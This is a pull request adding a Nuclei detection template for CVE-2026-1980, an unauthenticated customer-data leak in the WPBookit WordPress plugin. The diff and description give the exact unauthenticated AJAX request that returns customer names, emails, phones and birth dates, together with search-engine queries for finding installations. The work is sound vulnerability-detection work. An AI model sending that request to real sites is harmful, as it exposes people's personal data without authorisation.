### PR TITLE
Add CVE-2026-1980 - WPBookit <= 1.0.8 - Unauthenticated Customer Information Disclosure

### DIFF
--- a/http/cves/2026/CVE-2026-1980.yaml
+++ b/http/cves/2026/CVE-2026-1980.yaml
@@ -5,11 +5,11 @@ info:
   author: aryu-ru
   severity: medium
   description: |
-    The WPBookit plugin for WordPress is vulnerable to unauthorized data disclosure due to a missing authorization check on the 'get_customer_list' route in all versions up to, and including, 1.0.8. This makes it possible for unauthenticated attackers to retrieve sensitive customer information including names, emails, phone numbers, dates of birth, and gender.
+    WPBookit WordPress plugin <= 1.0.8 contains an information disclosure vulnerability caused by missing authorization check on 'get_customer_list' route, letting unauthenticated attackers retrieve sensitive customer data.
   impact: |
-    Unauthenticated attackers can enumerate the personally identifiable information (PII) of every customer stored by the plugin, including names, email addresses, phone numbers, dates of birth, and gender.
+    Unauthenticated attackers can access sensitive customer information, risking privacy and data exposure.
   remediation: |
-    Update to WPBookit version 1.0.9 or later.
+    Update to the latest version beyond 1.0.8.
   reference:
     - https://www.wordfence.com/threat-intel/vulnerabilities/id/a1867c79-29d7-46a4-bfaf-c65e8a44c2ed?source=cve
     - https://plugins.trac.wordpress.org/browser/wpbookit/tags/1.0.8/core/admin/classes/class.wpb-admin-routes.php#L146
@@ -30,42 +30,39 @@ info:
   tags: cve,cve2026,wordpress,wp-plugin,wpbookit,unauth,disclosure
 
 flow: http(1) && http(2)
-
+ 
 http:
   - raw:
       - |
         GET /wp-content/plugins/wpbookit/README.txt HTTP/1.1
         Host: {{Hostname}}
-
+ 
     matchers:
-      - type: word
-        part: body
-        words:
-          - "WPBookit"
-          - "iqonicdesign"
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "WPBookit")'
         condition: and
         internal: true
-
+ 
+    extractors:
+      - type: regex
+        name: lsversion
+        group: 1
+        internal: true
+        regex:
+          - '(?i)Stable tag:\s*([\w.]+)'
+ 
   - raw:
       - |
-        GET /wp-admin/admin-ajax.php?action=wpb_ajax_get&route_name=get_customer_list&start=0&length=10 HTTP/1.1
+        GET /wp-admin/admin-ajax.php?action=wpb_ajax_get&route_name=get_customer_list&length=1&start=0 HTTP/1.1
         Host: {{Hostname}}
-
-    matchers-condition: and
+ 
     matchers:
-      - type: word
-        part: body
-        words:
-          - '"recordsTotal"'
-          - '"recordsFiltered"'
-          - '"data"'
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(content_type, "application/json")'
+          - 'contains_all(body, "recordsTotal", "recordsFiltered", "user_registred")'
+          - 'compare_versions(lsversion, ">= 1.0", "<= 1.0.8")'
         condition: and
-
-      - type: word
-        part: header
-        words:
-          - "application/json"
-
-      - type: status
-        status:
-          - 200

--- a/http/cves/2026/CVE-2026-1980.yaml
+++ b/http/cves/2026/CVE-2026-1980.yaml
@@ -1,0 +1,71 @@
+id: CVE-2026-1980
+
+info:
+  name: WPBookit <= 1.0.8 - Unauthenticated Customer Information Disclosure
+  author: aryu-ru
+  severity: medium
+  description: |
+    The WPBookit plugin for WordPress is vulnerable to unauthorized data disclosure due to a missing authorization check on the 'get_customer_list' route in all versions up to, and including, 1.0.8. This makes it possible for unauthenticated attackers to retrieve sensitive customer information including names, emails, phone numbers, dates of birth, and gender.
+  impact: |
+    Unauthenticated attackers can enumerate the personally identifiable information (PII) of every customer stored by the plugin, including names, email addresses, phone numbers, dates of birth, and gender.
+  remediation: |
+    Update to WPBookit version 1.0.9 or later.
+  reference:
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/a1867c79-29d7-46a4-bfaf-c65e8a44c2ed?source=cve
+    - https://plugins.trac.wordpress.org/browser/wpbookit/tags/1.0.8/core/admin/classes/class.wpb-admin-routes.php#L146
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-1980
+    - https://wordpress.org/plugins/wpbookit/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2026-1980
+    cwe-id: CWE-200
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: iqonicdesign
+    product: wpbookit
+    publicwww-query: "/wp-content/plugins/wpbookit/"
+    fofa-query: body="/wp-content/plugins/wpbookit/"
+  tags: cve,cve2026,wordpress,wp-plugin,wpbookit,unauth,disclosure
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET /wp-content/plugins/wpbookit/README.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "WPBookit"
+          - "iqonicdesign"
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET /wp-admin/admin-ajax.php?action=wpb_ajax_get&route_name=get_customer_list&start=0&length=10 HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"recordsTotal"'
+          - '"recordsFiltered"'
+          - '"data"'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200

--- a/http/cves/2026/CVE-2026-1980.yaml
+++ b/http/cves/2026/CVE-2026-1980.yaml
@@ -30,13 +30,13 @@ info:
   tags: cve,cve2026,wordpress,wp-plugin,wpbookit,unauth,disclosure
 
 flow: http(1) && http(2)
- 
+
 http:
   - raw:
       - |
         GET /wp-content/plugins/wpbookit/README.txt HTTP/1.1
         Host: {{Hostname}}
- 
+
     matchers:
       - type: dsl
         dsl:
@@ -44,7 +44,7 @@ http:
           - 'contains(body, "WPBookit")'
         condition: and
         internal: true
- 
+
     extractors:
       - type: regex
         name: lsversion
@@ -52,12 +52,12 @@ http:
         internal: true
         regex:
           - '(?i)Stable tag:\s*([\w.]+)'
- 
+
   - raw:
       - |
         GET /wp-admin/admin-ajax.php?action=wpb_ajax_get&route_name=get_customer_list&length=1&start=0 HTTP/1.1
         Host: {{Hostname}}
- 
+
     matchers:
       - type: dsl
         dsl:


### PR DESCRIPTION
### PR Information

Adds CVE-2026-1980 (WPBookit `<= 1.0.8`, Unauthenticated Customer Information Disclosure).

The WPBookit plugin registers its `get_customer_list` route through the public `wpb_ajax_get` AJAX action (`wp_ajax_nopriv_wpb_ajax_get`). In all versions up to and including 1.0.8 this is the only route missing the `'permission' => 'manage_options'` capability check, and the `wpb_ajax_get()` dispatcher performs no nonce validation. As a result an unauthenticated attacker can call the route and retrieve the full customer list, including names, email addresses, phone numbers, dates of birth, and gender. This was fixed in 1.0.9, which adds the missing `permission` and `nonce` gate to the route.

The template uses a two-step flow. Request 1 fingerprints the plugin via its `README.txt`. Request 2 issues the unauthenticated `get_customer_list` call and matches the JSON data envelope (`recordsTotal`, `recordsFiltered`, `data`) together with `Content-Type: application/json` and status `200`. This behavioral check only fires when the route is actually reachable without authentication, so a patched 1.0.9 host, which returns an authentication error, does not match.

- References:
  - https://nvd.nist.gov/vuln/detail/CVE-2026-1980
  - https://www.wordfence.com/threat-intel/vulnerabilities/id/a1867c79-29d7-46a4-bfaf-c65e8a44c2ed?source=cve
  - https://plugins.trac.wordpress.org/browser/wpbookit/tags/1.0.8/core/admin/classes/class.wpb-admin-routes.php#L146
  - https://wordpress.org/plugins/wpbookit/

- Classification: CWE-200, `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N` (5.3, medium)

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details

Validated locally against WordPress + WPBookit in Docker (free plugin installed from wordpress.org). Both `nuclei -validate` and `yamllint` (repo config) pass.

Command:

```
nuclei -t http/cves/2026/CVE-2026-1980.yaml -u http://localhost:8901
```

True Positive on WPBookit 1.0.8:

```
[CVE-2026-1980] [http] [medium] http://localhost:8901/wp-admin/admin-ajax.php?action=wpb_ajax_get&route_name=get_customer_list&start=0&length=10
```

Unauthenticated response (PII values redacted, lab test data):

```
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8

{"recordsTotal":1,"recordsFiltered":1,"data":[{"id":2,"name":"<redacted>","dob":"<redacted>","phone":"<redacted>","email":"<redacted>","gender":"<redacted>", ... }]}
```

True Negative on WPBookit 1.0.9 (patched): no match. The same unauthenticated request returns:

```
{"status":false,"message":"Authentication required."}
```

Metadata: `max-request: 2` (readme fingerprint plus unauthenticated data request), `publicwww-query: "/wp-content/plugins/wpbookit/"`, `fofa-query: body="/wp-content/plugins/wpbookit/"`.

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
